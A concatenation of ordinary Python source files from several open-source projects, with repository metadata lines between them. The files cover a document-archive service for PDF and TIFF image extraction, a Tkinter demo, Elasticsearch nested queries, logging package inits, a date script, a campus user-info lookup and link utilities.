# ImageWidth, LONG, 1, width
256, 4, 1, width,
# ImageLength, LONG, 1, lenght
257, 4, 1, height,
# BitsPerSample, SHORT, 1, 1
258, 3, 1, 1,
# Compression, SHORT, 1, 4 = CCITT Group 4 fax encoding
259, 3, 1, compression,
# Threshholding, SHORT, 1, 0 = WhiteIsZero
262, 3, 1, 0,
# StripOffsets, LONG, 1, len of header
273, 4, 1, struct.calcsize(tiff_header_struct),
# RowsPerStrip, LONG, 1, lenght
278, 4, 1, height,
# StripByteCounts, LONG, 1, size of image
279, 4, 1, data_size,
# last IFD
0
)
def _extract_ccitt_fax(self, image_object):
'''
Tiff data may be stored as raw fax data without tiff header,
so it is necessary to create a tiff header for the data to
let PIL interpret the data correctly
'''
# pylint: disable=protected-access
width = image_object['/Width']
height = image_object['/Height']
data = image_object._data # sorry, getData() does not work for CCITTFaxDecode
#length = image_object['/Length']
#length = 4711
compression_map = {-1: 4, 0: 2, 1: 3}
compression = compression_map[image_object['/DecodeParms']['/K']]
tiff_header = self._generate_tiff_header_for_ccitt_fax(width,
height,
len(data),
compression)
return Image.open(BytesIO(tiff_header + data))
def _extract_jpg_data(self, image_object):
'''
There is (theoretically) no decoding to be done, so we
use the raw stream data (_data) without the decoding
hidden behind getData().
And then we let PIL determine from the header data what to do.
This does not work reliably, so we have to test the image
data and provoke an exception if it did not work
Well, it should work correctly. One of the sample files
generated with tiff2pdf does not work correctly, but this
seems to be the fault of tiff2pdf. Anyway, there might
be more corrupt pdfs in the wild, so we retain the test code.
'''
# pylint: disable=protected-access
data = image_object._data
image = Image.open(BytesIO(data))
# Simple check that the image data could be interpreted and can be written
# as png file
file = BytesIO()
image.save(file, 'png')
file.close()
return image
def _decode_data(self, image_object):
'''
We have just raw data, so we let pyPDF2 do the
decoding and then extract size and
colorspace from the meta data to give PIL the
information to correctly decode the data
'''
size = (image_object['/Width'], image_object['/Height'])
data = image_object.getData()
if image_object['/ColorSpace'] == '/DeviceRGB':
self.logger.debug("Extracting RGB color image")
mode = "RGB"
else:
self.logger.debug("Extracting black and white image")
mode = "P"
return Image.frombytes(mode, size, data)
def _find_image_objects(self, page):
'''
Loops over the objects and tries to find an image
'''
image_objects = []
try:
if not '/Resources' in page:
self.logger.debug("PdfReadError: Missing /Resources in page.")
return image_objects
if not '/XObject' in page['/Resources']:
self.logger.debug("No /XObject in /Resources.")
return image_objects
except PdfReadError as error:
self.logger.debug("PdfReadError: %s", error)
return image_objects
x_object = page['/Resources']['/XObject'].getObject()
for obj in x_object:
if '/Subtype' in x_object[obj] and x_object[obj]['/Subtype'] == '/Image':
image_objects.append(x_object[obj])
return image_objects
class PdfImageGenerator:
'''
Create an image from a pdf file
'''
@inject
def __init__(self, document_file_manager: DocumentFileManager,
pdf_image_extractor: PdfImageExtractor):
self.document_file_manager = document_file_manager
self.pdf_image_extractor = pdf_image_extractor
def generate_image(self, document_file_info):
'''
Uses the pdf image extractor to get an image from the pdf file
'''
file_path = self.document_file_manager.get_file_path(document_file_info)
return self.pdf_image_extractor.extract_image(file_path)
@singleton
class TextImageGenerator:
'''
To convert a text file into an image, this handler first
creates a pdf file from the text file and then extracts
an image from the pdf file.
'''
@inject
def __init__(self,
pdf_image_extractor: PdfImageExtractor,
pdf_generator: DocumentPdfGenerationService):
self.pdf_image_extractor = pdf_image_extractor
self.pdf_generator = pdf_generator
def generate_image(self, document_file_info):
'''
Writes a temporary pdf file and then uses the pdf image extractor
to create an image from the pdf
'''
pdf_from_text = self.pdf_generator.generate_file_pdf(document_file_info)
tmp_file = tempfile.NamedTemporaryFile(mode="wb", suffix='.pdf', delete=False)
tmp_file.write(pdf_from_text)
tmp_file.close()
image = self.pdf_image_extractor.extract_image(tmp_file.name)
os.unlink(tmp_file.name)
return image
@singleton
class MovieImageGenerator:
'''
Generates an image from a movie file 4 seconds into the movie
'''
@inject
def __init__(self, document_file_manager: DocumentFileManager):
self.document_file_manager = document_file_manager
def generate_image(self, document_file_info):
'''
Uses ffmpeg to write a frame of the given video as jpg file that then will
be read into a PIL image and the file removed.
'''
input_file_name = self.document_file_manager.get_file_path(document_file_info)
tmp_file = tempfile.NamedTemporaryFile(mode="wb", suffix='.jpg', delete=False)
tmp_file.close()
output_file_name = tmp_file.name
stdio = open(os.devnull, 'wb')
call(["ffmpeg",
"-itsoffset", "-4",
"-i", input_file_name,
"-vcodec", "mjpeg",
"-vframes", "1",
"-an",
"-f", "rawvideo",
"-y",
output_file_name
],
stdout=stdio,
stderr=stdio)
image = Image.open(output_file_name)
os.unlink(output_file_name)
return image
@singleton
class FileFormatService:
'''
Check service for file types.
Checks if the file type is supported, and when it is an
image file, determines the resolution and checks if it is
allowed.
The service may be configured overwriting the properties
supported_formats, format_aliases, resolution_handlers and
allowed resolutions
'''
@inject
def __init__(self, config: Config):
self.supported_formats = config.filetypes
self.format_aliases = config.filetypealiases
# TODO: Also put these options into the configuration
self.resolution_handlers = {'tif': get_graphic_file_resolution,
'jpg': get_graphic_file_resolution,
'png': get_graphic_file_resolution,
'gif': get_gif_file_resolution}
self.allowed_resolutions = {'tif': [300, 400]}
def get_format_and_resolution(self, file):
'''
Determines the file format and, if it
is a graphics format, the resolution.
'''
fileformat = self._get_file_format(file)
resolution = self._get_file_resolution(file, fileformat)
return fileformat, resolution
def _get_file_format(self, file):
'''
Determines the format and checks if it is supported.
If not, an UnsupportedFileFormat exception is raised.
'''
# pylint: disable=unused-variable
filename, file_extension = os.path.splitext(file) # @UnusedVariable
fileformat = file_extension[1:].lower()
if fileformat in self.format_aliases:
fileformat = self.format_aliases[fileformat]
if not fileformat in self.supported_formats:
raise UnsupportedFileFormat(fileformat)
return fileformat
def _get_file_resolution(self, file, fileformat):
'''
Determines the file resolution (if appropriate). Raises
an UnsupportedFileResolution exception, if it violates
the configured constraints.
'''
resolution = None
if fileformat in self.resolution_handlers:
resolution = self.resolution_handlers[fileformat](file)
if fileformat in self.allowed_resolutions:
if not resolution in self.allowed_resolutions[fileformat]:
raise UnsupportedFileResolution(fileformat, resolution)
return resolution
class DocumentService(BaseRecordService):
'''
Service to bundle the complicated document file management
with the database information
'''
@inject
def __init__(self,
dokument_dao: DocumentDao,
document_file_info_dao: DocumentFileInfoDao,
document_file_manager: DocumentFileManager,
document_type_dao: DocumentTypeDao,
document_file_provider: FileProvider,
ereignis_dao: EventDao,
file_format_service: FileFormatService,
filter_expression_builder:
baseinjectorkeys.DOCUMENT_FILTER_EXPRESSION_BUILDER_KEY):
# pylint: disable=too-many-arguments
BaseRecordService.__init__(self, dokument_dao, filter_expression_builder)
self.document_file_info_dao = document_file_info_dao
self.document_file_manager = document_file_manager
self.document_type_dao = document_type_dao
self.document_file_provider = document_file_provider
self.ereignis_dao = ereignis_dao
self.file_format_service = file_format_service
def get_by_id(self, object_id):
'''
Just reaches through to the dao.
'''
file_info = self.document_file_info_dao.get_by_id(object_id)
return self.dao.get_by_id(file_info.document_id)
def add_document_file(self, document, file):
'''
Determines the file format (might result in an exception if the
file format is not supported), then creates a new database entry
for the file and finally moves the file to its correct location.
'''
file_format, resolution = self.file_format_service.get_format_and_resolution(file)
file_info = self.document_file_info_dao.create_new_file_info(
document.id,
file_format,
resolution)
self._add_file_with_error_handling(file, file_info)
def replace_document_file(self, file_info, file):
'''
Updates the format and resolution information in the database
and moves the file to the place where it belongs. The existing
file will be renamed to have .deleted as suffix. A former .deleted
file will be overwritten.
'''
self.document_file_manager.delete_file(file_info)
file_info.filetype, file_info.resolution = \
self.file_format_service.get_format_and_resolution(file)
self.document_file_info_dao.save(file_info)
self._add_file_with_error_handling(file, file_info)
def _add_file_with_error_handling(self, file, file_info):
'''
Helper method that tries to make as little mess as possible
in the filesystem if something goes wrong.
'''
# pylint: disable=bare-except
try:
self.document_file_manager.add_file(file, file_info)
except Exception as generic_exception:
try:
self.document_file_manager.delete_file(file_info)
except:
pass
self.document_file_info_dao.delete(file_info.id)
raise generic_exception
def delete_file(self, document_file_info):
'''
Just deletes one document file (and the pertaining database information).
The document entry itself remains.
'''
self.document_file_manager.delete_file(document_file_info)
self.document_file_info_dao.delete(document_file_info.id)
# pylint: disable=arguments-differ
def delete(self, document):
'''
Deletes all the document files and all the database information
'''
file_infos = self.document_file_info_dao.get_file_infos_for_document(document.id)
for file_info in file_infos:
self.document_file_manager.delete_file(file_info)
self.dao.delete(document.id)
def get_file_infos_for_document(self, document):
'''
Returns all the file infos for the given document (what else?).
'''
return self._update_resolutions(
self.document_file_info_dao.get_file_infos_for_document(document.id))
def get_file_info_by_id(self, file_info_id):
'''
Returns the file info for a given file id
'''
return self._update_resolution(self.document_file_info_dao.get_by_id(file_info_id))
def get_file_for_file_info(self, file_info):
'''
Returns the path to the file described by the file_info
'''
return self.document_file_manager.get_file_path(file_info)
def get_pdf(self, document):
'''
Returns the document pdf file as byte string
'''
return self.document_file_provider.get_pdf(document)
def get_thumbnail(self, document_file_info):
'''
Returns a thumbnail for the document as byte string
'''
return self.document_file_provider.get_thumbnail(document_file_info)
def get_display_image(self, document_file_info):
'''
Returns a graphical representation of the document as byte string
'''
return self.document_file_provider.get_display_image(document_file_info)
def create_new(self):
'''
Just calls the document constructor to get a new Document entity.
'''
# pylint: disable=no-self-use
document = Document()
document.document_type = self.document_type_dao.get_by_id(1)
return document
def _update_resolution(self, file_info):
'''
The resolution information in the database is not complete (due to
historical reasons). This is an auxiliary method to correct this
until the database is cleaned up.
'''
if not file_info.resolution is None:
return file_info
if file_info.filetype == 'gif':
# More historical debt: gif files always have a resolution of 72 dpi,
# but in the early days we scanned with 300 dpi and saved them as gif,
# so the gif seems to be too large. So in fact we have to interpret
# the resolution as 300
file_info.resolution = get_gif_file_resolution(None)
return file_info
if file_info.filetype in ('jpg', 'png', 'tif'):
try:
file_path = self.document_file_manager.get_file_path(file_info)
except DocumentFileNotFound:
return self._set_default_resolution(file_info)
file_info.resolution = get_graphic_file_resolution(file_path)
if not file_info.resolution:
file_info = self._set_default_resolution(file_info)
return file_info
# pylint: disable=no-self-use
def _set_default_resolution(self, file_info):
if file_info.filetype == 'jpg':
file_info.resolution = 72
else:
file_info.resolution = 300
return file_info
def _update_resolutions(self, file_info_list):
updated_list = []
for file_info in file_info_list:
updated_list.append(self._update_resolution(file_info))
return updated_list
@singleton
class DocumentTypeService(object):
'''
classdocs
'''
@inject
def __init__(self, document_type_dao: DocumentTypeDao):
'''
Constructor
'''
self.document_type_dao = document_type_dao
def get_document_type_dict(self):
'''
Returns all document types in form of a dictionary.
'''
type_dict = {}
types = self.document_type_dao.get_all()
for document_type in types:
type_dict[document_type.description.upper()] = document_type
return type_dict
def get_document_types(self):
'''
Returns all document types as a dictionary with
the document type id as key and the document type description
as value.
'''
type_dict = {}
types = self.document_type_dao.get_all()
for document_type in types:
type_dict[document_type.id] = document_type.description
return type_dict
def get_by_id(self, doc_type_id):
'''
Fetches a single document type by id.
'''
return self.document_type_dao.get_by_id(doc_type_id)
@singleton
class EventService(BaseRecordService):
'''
Service for event handling. Most of the calls are just
passed through to the daos.
'''
@inject
def __init__(self,
ereignis_dao: EventDao,
filter_expression_builder: baseinjectorkeys.EVENT_FILTER_EXPRESSION_BUILDER_KEY,
event_crossreferences_dao: EventCrossreferencesDao,
event_type_dao: EventTypeDao):
BaseRecordService.__init__(self, ereignis_dao, filter_expression_builder)
self.event_crossreferences_dao = event_crossreferences_dao
self.event_type_dao = event_type_dao
def get_events_for_date(self, alex_date):
'''
Returns all events that have the given start date
'''
return self.dao.get_events_for_date(alex_date)
def get_cross_references(self, event):
'''
Returns all events that are crossreferenced to the given event.
'''
if event is None:
return []
crossreference_ids = self.event_crossreferences_dao.get_cross_references(event.id)
events = []
for crossreference_id in crossreference_ids:
events.append(self.dao.get_by_id(crossreference_id))
return events
def remove_cross_reference(self, event1, event2):
'''
Removes the crossreference between the given two events.
'''
self.event_crossreferences_dao.remove_cross_reference(event1.id, event2.id)
def add_cross_reference(self, event1, event2):
'''
Crossreferences the two given events.
'''
self.event_crossreferences_dao.add_cross_reference(event1.id, event2.id)
def create_new(self, date_range):
'''
Creates a new event object for the given date range.
'''
# pylint: disable=no-self-use
event = Event()
event.daterange = date_range
return event
# pylint: disable=arguments-differ
def delete(self, event):
self.dao.delete(event.id)
def get_event_types(self, event):
'''
Fetches the event types registered for the given event.
'''
return self.event_type_dao.get_event_types_for_event_id(event.id)
def add_event_type(self, event, event_type):
'''
Registers a new event type for the given event.
'''
self.event_type_dao.join_event_type_to_event_id(event.id, event_type)
def remove_event_type(self, event, event_type):
'''
Removes an event type from the list of event
types registered with the given event.
'''
self.event_type_dao.unlink_event_type_from_event_id(event.id, event_type)
def get_event_type_tree(self):
'''
Returns all event types wrapped into a tree object.
'''
entities = self.event_type_dao.find_all()
entities.append(
EventType(EventTypeIdentifier(0, 0),
_("Event types")))
return Tree(entities)
@singleton
class ReferenceService:
'''
Service for handling references to the main records.
'''
@inject
def __init__(self,
event_dao: EventDao,
document_dao: DocumentDao,
references_dao: DocumentEventRelationsDao):
'''
Used for injection.
'''
self.event_dao = event_dao
self.document_dao = document_dao
self.references_dao = references_dao
def get_events_referenced_by_document(self, document):
'''
Returns the events that are related to a document.
'''
event_ids = self.references_dao.fetch_ereignis_ids_for_dokument_id(document.id)
events = []
for event_id in event_ids:
events.append(self.event_dao.get_by_id(event_id))
return events
def get_documents_referenced_by_event(self, event):
'''
Returns the documents that are related to an event.
'''
document_ids = self.references_dao.fetch_document_ids_for_event_id(event.id)
documents = []
for document_id in document_ids:
documents.append(self.document_dao.get_by_id(document_id))
return documents
def link_document_to_event(self, document, event):
'''
Creates a reference between a document and an event.
'''
self.references_dao.join_document_id_with_event_id(document.id, event.id)
def delete_document_event_relation(self, document, event):
'''
Removes the reference between a document and an event.
'''
self.references_dao.delete_document_event_relation(document.id, event.id)
class ServiceModule(Module):
'''
Injector module for the services.
'''
#def configure(self, binder):
#dao_module = DaoModule()
#dao_module.configure(binder)
#binder.bind(baseinjectorkeys.DOCUMENT_FILE_MANAGER_KEY,
# ClassProvider(DocumentFileManager), scope=singleton)
#binder.bind(baseinjectorkeys.DOCUMENT_PDF_GENERATOR_KEY,
# ClassProvider(DocumentPdfGenerationService), scope=singleton)
#binder.bind(baseinjectorkeys.GRAPHICS_PDF_HANDLER_KEY,
# ClassProvider(GraphicsPdfHandler), scope=singleton)
#binder.bind(baseinjectorkeys.TEXT_PDF_HANDLER_KEY,
# ClassProvider(TextPdfHandler), scope=singleton)
#binder.bind(baseinjectorkeys.EVENT_SERVICE_KEY,
# ClassProvider(EventService), scope=singleton)
#binder.bind(baseinjectorkeys.DOCUMENT_SERVICE_KEY,
# ClassProvider(DocumentService), scope=singleton)
#binder.bind(baseinjectorkeys.DOCUMENT_TYPE_SERVICE_KEY,
# ClassProvider(DocumentTypeService), scope=singleton)
#binder.bind(baseinjectorkeys.REFERENCE_SERVICE_KEY,
# ClassProvider(ReferenceService), scope=singleton)
#binder.bind(baseinjectorkeys.FILE_FORMAT_SERVICE,
# ClassProvider(FileFormatService), scope=singleton)
#binder.bind(baseinjectorkeys.CREATOR_SERVICE_KEY,
# ClassProvider(CreatorService), scope=singleton)
#binder.bind(baseinjectorkeys.DATABASE_UPGRADE_SERVICE_KEY,
# ClassProvider(DatabaseUpgradeService), scope=singleton)
#binder.bind(baseinjectorkeys.DOCUMENT_FILE_IMAGE_GENERATOR_KEY,
# ClassProvider(DocumentFileImageGenerator), scope=singleton)
#binder.bind(baseinjectorkeys.GRAPHICS_IMAGE_GENERATOR_KEY,
# ClassProvider(GraphicsImageGenerator), scope=singleton)
#binder.bind(baseinjectorkeys.TEXT_IMAGE_GENERATOR_KEY,
# ClassProvider(TextImageGenerator), scope=singleton)
#binder.bind(baseinjectorkeys.PDF_IMAGE_GENERATOR_KEY,
# ClassProvider(PdfImageGenerator), scope=singleton)
#binder.bind(baseinjectorkeys.MOVIE_IMAGE_GENERATOR_KEY,
# ClassProvider(MovieImageGenerator), scope=singleton)
#binder.bind(baseinjectorkeys.PDF_IMAGE_EXTRACTOR_KEY,
# ClassProvider(PdfImageExtractor), scope=singleton)
#binder.bind(baseinjectorkeys.DOCUMENT_FILE_PROVIDER,
# ClassProvider(FileProvider), scope=singleton)
@provider
@inject
def provide_pdf_handlers(self,
graphics_handler: GraphicsPdfHandler,
text_handler: TextPdfHandler
) -> baseinjectorkeys.PDF_HANDLERS_KEY:
'''
Returns the handlers to create pdf representations for certain
file types.
'''
# pylint: disable=no-self-use
return {'jpg': graphics_handler,
'tif': graphics_handler,
'gif': graphics_handler,
'txt': text_handler}
@provider
@inject
def provide_image_generators(self,
graphics_image_generator: GraphicsImageGenerator,
text_image_generator: TextImageGenerator,
pdf_image_generator: PdfImageGenerator,
movie_image_generator: MovieImageGenerator
) -> baseinjectorkeys.IMAGE_GENERATORS_KEY:
'''
Returns the handlers for graphic images
'''
# pylint: disable=no-self-use
return {'jpg': graphics_image_generator,
'tif': graphics_image_generator,
'gif': graphics_image_generator,
'txt': text_image_generator,
'pdf': pdf_image_generator,
'mpg': movie_image_generator}
|
archivsozialebewegungen/AlexandriaBase
|
alexandriabase/services.py
|
Python
|
gpl-3.0
| 69,870
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
ZetCode Tkinter tutorial
This script shows a simple window
on the screen.
Author: Jan Bodnar
Last modified: November 2015
Website: www.zetcode.com
"""
from Tkinter import Tk, Frame, BOTH
from ttk import Button, Style
class myApp(Frame):
def __init__(self, parent):
Frame.__init__(self, parent, background="white")
self.parent = parent
self.initUI()
def initUI(self):
w = self.parent.winfo_screenwidth()/2
h = self.parent.winfo_screenheight()/2
sw = self.parent.winfo_screenwidth()
sh = self.parent.winfo_screenheight()
x = (sw - w)/2
y = (sh - h)/2
self.parent.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.parent.title("myApp")
self.style = Style()
self.style.theme_use("default")
self.pack(fill=BOTH, expand=1)
quitButton = Button(self, text="Quit",
command=self.quit)
quitButton.place(x=w/2, y=h/2)
def main():
root = Tk()
#
app = myApp(root)
root.mainloop()
if __name__ == '__main__':
main()
|
iosonosempreio/getsorted
|
ex1.py
|
Python
|
gpl-3.0
| 1,164
|
# encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http:# mozilla.org/MPL/2.0/.
#
# Author: Kyle Lahnakoski (kyle@lahnakoski.com)
#
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from jx_elasticsearch import es09, es14
from mo_dots import split_field, FlatList, listwrap, literal_field, coalesce, Data, unwrap, concat_field, join_field
from mo_logs import Log
from mo_threads import Thread
from pyLibrary import convert
from jx_base.expressions import compile_expression
from jx_elasticsearch.es14.expressions import split_expression_by_depth, simplify_esfilter, AndOp, Variable, LeavesOp
from jx_elasticsearch.es14.setop import format_dispatch
from jx_elasticsearch.es14.util import jx_sort_to_es_sort
from jx_python.containers import STRUCT
from jx_python.query import DEFAULT_LIMIT
from mo_times.timer import Timer
EXPRESSION_PREFIX = "_expr."
_ = convert
def is_deepop(es, query):
if query.edges or query.groupby:
return False
if all(s.aggregate not in (None, "none") for s in listwrap(query.select)):
return False
if len(split_field(query.frum.name)) > 1:
return True
# ASSUME IT IS NESTED IF WE ARE ASKING FOR NESTED COLUMNS
# vars_ = query_get_all_vars(query)
# columns = query.frum.get_columns()
# if any(c for c in columns if len(c.nested_path) != 1 and c.name in vars_):
# return True
return False
def es_deepop(es, query):
schema = query.frum.schema
columns = schema.columns
query_path = schema.query_path
map_to_local = {k: get_pull(c[0]) for k, c in schema.lookup.items()}
# TODO: FIX THE GREAT SADNESS CAUSED BY EXECUTING post_expressions
# THE EXPRESSIONS SHOULD BE PUSHED TO THE CONTAINER: ES ALLOWS
# {"inner_hit":{"script_fields":[{"script":""}...]}}, BUT THEN YOU
# LOOSE "_source" BUT GAIN "fields", FORCING ALL FIELDS TO BE EXPLICIT
post_expressions = {}
es_query, es_filters = es14.util.es_query_template(query.frum.name)
# SPLIT WHERE CLAUSE BY DEPTH
wheres = split_expression_by_depth(query.where, schema)
for i, f in enumerate(es_filters):
# PROBLEM IS {"match_all": {}} DOES NOT SURVIVE set_default()
for k, v in unwrap(simplify_esfilter(AndOp("and", wheres[i]).to_esfilter())).items():
f[k] = v
if not wheres[1]:
more_filter = {
"and": [
simplify_esfilter(AndOp("and", wheres[0]).to_esfilter()),
{"not": {
"nested": {
"path": query_path,
"filter": {
"match_all": {}
}
}
}}
]
}
else:
more_filter = None
es_query.size = coalesce(query.limit, DEFAULT_LIMIT)
es_query.sort = jx_sort_to_es_sort(query.sort)
es_query.fields = []
is_list = isinstance(query.select, list)
new_select = FlatList()
i = 0
for s in listwrap(query.select):
if isinstance(s.value, LeavesOp):
if isinstance(s.value.term, Variable):
if s.value.term.var == ".":
# IF THERE IS A *, THEN INSERT THE EXTRA COLUMNS
for c in columns:
if c.type not in STRUCT and c.es_column != "_id":
if c.nested_path[0] == ".":
es_query.fields += [c.es_column]
new_select.append({
"name": c.names[query_path],
"pull": get_pull(c),
"nested_path": c.nested_path[0],
"put": {"name": literal_field(c.names[query_path]), "index": i, "child": "."}
})
i += 1
# REMOVE DOTS IN PREFIX IF NAME NOT AMBIGUOUS
col_names = set(c.names[query_path] for c in columns)
for n in new_select:
if n.name.startswith("..") and n.name.lstrip(".") not in col_names:
n.name = n.name.lstrip(".")
n.put.name = literal_field(n.name)
col_names.add(n.name)
else:
prefix = schema[s.value.term.var][0].names["."] + "."
prefix_length = len(prefix)
for c in columns:
cname = c.names["."]
if cname.startswith(prefix) and c.type not in STRUCT:
pull = get_pull(c)
if c.nested_path[0] == ".":
es_query.fields += [c.es_column]
new_select.append({
"name": s.name + "." + cname[prefix_length:],
"pull": pull,
"nested_path": c.nested_path[0],
"put": {
"name": s.name + "." + literal_field(cname[prefix_length:]),
"index": i,
"child": "."
}
})
i += 1
elif isinstance(s.value, Variable):
if s.value.var == ".":
for c in columns:
if c.type not in STRUCT and c.es_column != "_id":
if len(c.nested_path) == 1:
es_query.fields += [c.es_column]
new_select.append({
"name": c.name,
"pull": get_pull(c),
"nested_path": c.nested_path[0],
"put": {"name": ".", "index": i, "child": c.es_column}
})
i += 1
elif s.value.var == "_id":
new_select.append({
"name": s.name,
"value": s.value.var,
"pull": "_id",
"put": {"name": s.name, "index": i, "child": "."}
})
i += 1
else:
prefix = schema[s.value.var][0]
if not prefix:
net_columns = []
else:
parent = prefix.es_column+"."
prefix_length = len(parent)
net_columns = [c for c in columns if c.es_column.startswith(parent) and c.type not in STRUCT]
if not net_columns:
pull = get_pull(prefix)
if len(prefix.nested_path) == 1:
es_query.fields += [prefix.es_column]
new_select.append({
"name": s.name,
"pull": pull,
"nested_path": prefix.nested_path[0],
"put": {"name": s.name, "index": i, "child": "."}
})
else:
done = set()
for n in net_columns:
# THE COLUMNS CAN HAVE DUPLICATE REFERNCES TO THE SAME ES_COLUMN
if n.es_column in done:
continue
done.add(n.es_column)
pull = get_pull(n)
if len(n.nested_path) == 1:
es_query.fields += [n.es_column]
new_select.append({
"name": s.name,
"pull": pull,
"nested_path": n.nested_path[0],
"put": {"name": s.name, "index": i, "child": n.es_column[prefix_length:]}
})
i += 1
else:
expr = s.value
for v in expr.vars():
for c in schema[v]:
if c.nested_path[0] == ".":
es_query.fields += [c.es_column]
# else:
# Log.error("deep field not expected")
pull = EXPRESSION_PREFIX + s.name
post_expressions[pull] = compile_expression(expr.map(map_to_local).to_python())
new_select.append({
"name": s.name if is_list else ".",
"pull": pull,
"value": expr.__data__(),
"put": {"name": s.name, "index": i, "child": "."}
})
i += 1
# <COMPLICATED> ES needs two calls to get all documents
more = []
def get_more(please_stop):
more.append(es09.util.post(
es,
Data(
filter=more_filter,
fields=es_query.fields
),
query.limit
))
if more_filter:
need_more = Thread.run("get more", target=get_more)
with Timer("call to ES") as call_timer:
data = es09.util.post(es, es_query, query.limit)
# EACH A HIT IS RETURNED MULTIPLE TIMES FOR EACH INNER HIT, WITH INNER HIT INCLUDED
def inners():
for t in data.hits.hits:
for i in t.inner_hits[literal_field(query_path)].hits.hits:
t._inner = i._source
for k, e in post_expressions.items():
t[k] = e(t)
yield t
if more_filter:
Thread.join(need_more)
for t in more[0].hits.hits:
yield t
#</COMPLICATED>
try:
formatter, groupby_formatter, mime_type = format_dispatch[query.format]
output = formatter(inners(), new_select, query)
output.meta.timing.es = call_timer.duration
output.meta.content_type = mime_type
output.meta.es_query = es_query
return output
except Exception as e:
Log.error("problem formatting", e)
def get_pull(column):
if column.nested_path[0] == ".":
return concat_field("fields", literal_field(column.es_column))
else:
depth = len(split_field(column.nested_path[0]))
rel_name = split_field(column.es_column)[depth:]
return join_field(["_inner"] + rel_name)
|
maggienj/ActiveData
|
jx_elasticsearch/es14/deep.py
|
Python
|
mpl-2.0
| 10,475
|
import pathlib
__author__ = 'EAMY'
__email__ = 'team@eamy.org'
__version__ = '0.1.0'
from . import config
datapath = pathlib.Path('.').resolve().joinpath(config.DATADIR)
config.DATADIR = str(datapath)
config.PIDFILE = str(datapath.joinpath(config.PIDFILE))
config.LOGFILE = str(datapath.joinpath(config.LOGFILE))
|
eamy-org/imi
|
imi/__init__.py
|
Python
|
mpl-2.0
| 316
|
# flake8: noqa
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from .logger import *
from .loglistener import LogMessageServer
from .loggingmixin import LoggingMixin
|
Yukarumya/Yukarum-Redfoxes
|
testing/mozbase/mozlog/mozlog/unstructured/__init__.py
|
Python
|
mpl-2.0
| 318
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Get current date. """
import datetime
CURDATE = None
def get_current_date():
"""
Returns the current date as a date object.
"""
return datetime.date.today()
if __name__ == '__main__':
CURDATE = get_current_date()
print CURDATE
|
rrafiringa/is210-week-05-synthesizing
|
task_01.py
|
Python
|
mpl-2.0
| 308
|
# coding=utf-8
'''
@author:黄鑫晨
2016.12
'''
import json
import urllib
import urllib2
from mod.databases.tables import Users
_uuid = 'fd4b2c58db1e394d312c9e7ca53e588999f491ce'
def get_uinfo_from_uuid(_uuid):
""" 通过uuid 获取一卡通号,获得真实姓名等信息 """
_check_path = 'http://www.heraldstudio.com/api/user'
# print (_uuid)
params = {'uuid': _uuid}
data = urllib.urlencode(params)
req = urllib2.Request(_check_path, data)
response = urllib2.urlopen(req)
res_json = response.read()
encodejson = json.loads(res_json, encoding="utf-8")
return encodejson['content']
class User_info_handler(object):
def __init__(self, db):
self.db = db
'''
完善用户信息,将用户真实姓名写入user表中
'''
def complete_user_name(self, uuid):
'''
从一卡通获取用户真实姓名,如果原来是空则增加到数据库中
:return:
'''
try:
uinfo = get_uinfo_from_uuid(uuid)
name = uinfo['name']
cardnum = uinfo['cardnum']
try:
user = self.db.query(Users).filter(Users.cardnum == cardnum).one()
# 已存则返回真实姓名
if user.name:
pass
# 没存则获取并存再返回
else:
# 返回真实姓名
real_name = name
# 将真实姓名存入到数据库中
user.name = real_name
try:
self.db.commit()
except Exception, e:
print e
except Exception, e:
print e
except Exception,e:
print '获取用户信息出错'
def get_user_name_from_cardnum(self, cardnum):
'''
从一卡通获取用户真实姓名
:return:
'''
try:
user = self.db.query(Users).filter(Users.cardnum == cardnum).one()
# 已存则返回真实姓名
if user.name:
return user.name
except Exception, e:
return 0
# 匿名评论模型
def get_comment_model(self, each, is_parased, ano):
'''
:param each: 传入评论的一项
:param is_parased: 是否点过赞
:param ano: 是否匿名,1为匿名
:return:
'''
if ano == 1:
# 匿名
comment_anonymous = dict(
time=each.commentT.strftime('%Y-%m-%d %H:%M:%S'),
user_name='匿名用户'.decode('utf-8'),
likeN=each.likeN,
content=each.content,
cid=each.id,
parase=is_parased # 是否点过赞
)
return comment_anonymous
elif ano == 0:
# 实名评论
real_name = self.get_user_name_from_cardnum(each.cardnum)
comment_real = dict(
time=each.commentT.strftime('%Y-%m-%d %H:%M:%S'),
user_name=real_name,
likeN=each.likeN,
content=each.content,
cid=each.id,
parase=is_parased # 是否点过赞
)
return comment_real
def check_superuser(_superuser):
""" 修改状态时, 用于超级用户是否有效 """
return True
if __name__ == "__main__":
pass
user_info_handler = User_info_handler(db)
print user_info_handler.complete_user_name(_uuid)
print user_info_handler.get_user_name_from_cardnum('213160925')
|
HeraldStudio/HeraldAppApi
|
mod/huati/getUserInfo.py
|
Python
|
mpl-2.0
| 3,658
|
import json
from configparser import ConfigParser, NoOptionError, NoSectionError
import pymysql
class Link(object):
def __init__(self, *args):
(self.kind, self.target, self.extra, self.slug, self.locale,
self.hash) = args
@property
def args(self):
return (self.kind, self.target, self.extra, self.slug, self.locale,
self.hash)
def __repr__(self):
return ('<sumomomig.utils.Link (' +
', '.join(str(x) for x in self.args) +
')>')
def __str__(self):
linktext = self.target or ''
if self.kind != 'Article':
if not linktext.startswith(self.kind + ':'):
linktext = self.kind + ':' + linktext
if self.hash:
linktext += self.hash
if self.extra:
linktext += '|' + self.extra
return '[[' + linktext + ']]'
def __json__(self):
return self.args
class Image(object):
def __init__(self, *args):
(self.title, self.locale, self.description, self.file,
self.thumbnail) = args
@property
def args(self):
return (self.title, self.locale, self.description, self.file,
self.thumbnail)
def __repr__(self):
return '<sumomomig.utils.Image "{0.title}">'.format(self)
def __json__(self):
return self.args
def as_dict(self):
return {
'title': self.title,
'locale': self.locale,
'description': self.description,
'file': self.file,
'thumbnail': self.thumbnail,
}
class MyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
elif hasattr(obj, '__json__'):
return obj.__json__()
return super(MyEncoder, self).default(obj)
